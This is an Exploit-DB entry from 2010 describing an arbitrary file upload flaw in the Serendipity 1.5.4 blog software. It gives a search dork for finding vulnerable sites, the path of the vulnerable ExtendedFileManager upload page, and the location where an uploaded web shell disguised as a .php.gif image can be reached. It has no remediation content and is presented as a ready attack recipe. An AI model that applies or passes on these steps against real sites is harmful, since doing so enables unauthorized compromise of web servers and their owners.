Serendipity 1.5.4 - Arbitrary File Upload Vulnerability 0day

2010-12-21T00:00:00
ID EDB-ID:15795
Type exploitdb
Reporter pentesters.ir
Modified 2010-12-21T00:00:00

Description

Serendipity 1.5.4 - Arbitrary File Upload Vulnerability (0day). Webapps exploit for php platform

                                        
                                            In The Name Of GOD 
[+] Exploit Title:remote 0day file upload
[+] Date: 2010
[+] script:Serendipity 1.5.4
[+] Software Link: http://www.s9y.org/12.html
[+] Author  : pentesters.ir
[+]discovered by:ahmadbady
[+] Contact : kivi_hacker666@yahoo.com
[+] Website : WwW.PenTesters.IR 
[+] Greeting: Behzad, navid, ...
[+]dork:"Powered by s9y"  and  "Powered by serendipity"
----------------------------------------------------------------------------
up:
/path/htmlarea/plugins/ExtendedFileManager/manager.php

shell:
/htmlarea/plugins/ExtendedFileManager/demo_images/shell.php.gif
------------------------------------------------------------------------------